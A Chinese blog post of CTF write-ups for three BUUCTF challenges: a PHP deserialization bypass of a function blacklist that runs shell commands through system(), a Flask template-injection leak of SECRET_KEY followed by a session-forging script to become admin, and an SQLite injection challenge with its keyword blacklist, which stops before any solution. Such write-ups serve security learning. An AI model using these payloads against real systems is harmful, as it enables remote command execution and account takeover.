buu刷题记录
昨天请学弟们吃了顿饭,roar一直在摸(一直没出),刷两道buu水一下博客吧。好久没写博客了
[网鼎杯 2020 朱雀组]phpweb
打开界面是带带大师兄,每隔一段时间会自动刷新一次,并显示出最新的时间。抓包后发现是post了两个参数的值:func和p,【一个体重九十多公斤(不是)】应该是调用了call_user_func函数,尝试去执行一些系统命令,发现会回显hacker所以应该是被过滤了。但是我们可以用func=file_get_contents&p=index.php去读取index.php的内容如下:
1 <?php2 $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");3 function gettime($func, $p) {4 $result = call_user_func($func, $p);5 $a= gettype($result);6 if ($a == "string") {7 return $result;8 } else {return "";}9 }10 classTest {11 var $p = "Y-m-d h:i:s a";12 var $func = "date";13 function__destruct() {14 if ($this->func != "") {15 echo gettime($this->func, $this->p);16 }17 }18 }19 $func = $_REQUEST["func"];20 $p = $_REQUEST["p"];21
22 if ($func != null) {23 $func = strtolower($func);24 if (!in_array($func,$disable_fun)) {25 echo gettime($func, $p);26 }else{27 die("Hacker...");28 }29 }
可以看到出题人使用黑名单过滤了一大堆危险函数,感觉已经是无路可走了。。。实际上可以使用构造反序列化的手段,使func=unserialize&p=payload,下面贴出生成payload的exp:
1 <?php2
3 $disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");4 function gettime($func, $p)5 {6 $result = call_user_func($func, $p);7 $a = gettype($result);8 if ($a == "string") {9 return $result;10 } else{11 return "";12 }13 }14
15 classTest16 {17 var $p = "Y-m-d h:i:s a";18 var $func = "date";19
20 function__destruct()21 {22 if ($this->func != "") {23 echo gettime($this->func, $this->p);24 }25 }26 }27
28 /*$func = $_REQUEST["func"];29 $p = $_REQUEST["p"];30
31 if ($func != null) {32 $func = strtolower($func);33 if (!in_array($func, $disable_fun)) {34 echo gettime($func, $p);35 } else {36 die("Hacker...");37 }38 }*/
39 $a = newTest();40 /*$a ->p = 'ls';*/
41 /*$a -> p = 'ls /';*/
42 $a->p ="find / -name 'flag*'";43 $a ->func = 'system';44 print_r(urlencode(serialize($a)));45
46
47 ?>
func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D
flag{89e676b6-cf76-4184-9f0d-12f5b9682804}
gg
[FBCTF2019]Event
一番探查看出来存在ssti,post传值的过程中:
event_name=2333&event_address=123&event_important=__class__(或者用__dict__)存在回显,于是我们能确定存在ssti
event_name=2333&event_address=123&event_important=__class__.__init__.__globals__
event_important处存在ssti,于是我们查看配置信息:(此题模板是flask)
event_name=2333&event_address=123&event_important=__class__.__init__.__globals__[app].config
得到重要信息:'SECRET_KEY': 'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
拿到secretkey之后进行伪造,将用户名改成admin就行了、flask原理:json->zlib->base64后的源字符串 . 时间戳 . hmac签名信息
贴脚本:
1 from flask importFlask2 from flask.sessions importSecureCookieSessionInterface3
4 app = Flask(__name__)5 app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
6
7 session_serializer =SecureCookieSessionInterface().get_signing_serializer(app)8
9 @app.route('/')10 defindex():11 print(session_serializer.dumps("admin"))12
13 index()
flag{63a5dfbd-241a-4a52-bbbe-7fc46c058dae}
[HarekazeCTF2019]Sqlite Voting
这个题的出题人有点可怕。。。。
打开是一个选择你喜欢的小动物的界面:
下面有两个链接,第一个给出的源码如下:
1 <?php2 error_reporting(0);3
4 if (isset($_GET['source'])) {5 show_source(__FILE__);6 exit();7 }8
9 function is_valid($str) {10 $banword =[11 //dangerous chars12 // " % ' * + / < = > _ ` ~ -
13 "["%'*+\/<=>\\_`~-]",
14 //whitespace chars
15 's',
16 //dangerous functions
17 'blob', 'load_extension', 'char', 'unicode',
18 '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp',
19 'in', 'limit', 'order', 'union', 'join'
20 ];21 $regexp = '/' . implode('|', $banword) . '/i';22 if (preg_match($regexp, $str)) {23 return false;24 }25 return true;26 }27
28 header("Content-Type: text/json; charset=utf-8");29
30 //check user input
31 if (!isset($_POST['id']) || empty($_POST['id'])) {32 die(json_encode(['error' => 'You must specify vote id']));33 }34 $id = $_POST['id'];35 if (!is_valid($id)) {36 die(json_encode(['error' => 'Vote id contains dangerous chars']));37 }38
39 //update database
40 $pdo = new PDO('sqlite:../db/vote.db');41 $res = $pdo->query("UPDATE vote SET count = count + 1 WHERE id = ${id}");42 if ($res === false) {43 die(json_encode(['error' => 'An error occurred while updating database']));44 }45
46 //succeeded!
47 echojson_encode([48 'message' => 'Thank you for your vote! The result will be published after the CTF finished.'
49 ]);
另一个链接提供了sql代码:
1 DROP TABLE IF EXISTS`vote`;2 CREATE TABLE`vote` (3 `id` INTEGER PRIMARY KEYAUTOINCREMENT,4 `name` TEXT NOT NULL,5 `count` INTEGER
6 );7 INSERT INTO `vote` (`name`, `count`) VALUES
8 ('dog', 0),9 ('cat', 0),10 ('zebra', 0),11 ('koala', 0);12
13 DROP TABLE IF EXISTS`flag`;14 CREATE TABLE`flag` (15 `flag` TEXT NOT NULL
16 );17 INSERT INTO `flag` VALUES ('HarekazeCTF{}');
在vote.php界面中我们可以上传id参数,从题目我们可以看出后台的数据库是sqlite,可以尝试进行sqli注入。sqlite与一般注入没什么不同的地方,只要用到隐藏表格就行。
但是我们在vote.php界面看到的代码里面有黑名单,过滤了" % ' * + / < = > _ ` ~ -这些字符(不得不说老外的题目还写在注释里真的很贴心了)以及'blob', 'load_extension', 'char', 'unicode', 18 '(in|sub)str', '[lr]trim', 'like', 'glob', 'match', 'regexp', 19 'in', 'limit', 'order', 'union', 'join' 这些危险字符
根据回显我们应该可以进行bool盲注,但是 ', ", char被过滤了之后我们无法直接进行字符判断或者ascii
内容来源于网络如有侵权请私信删除
扫一扫
6万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
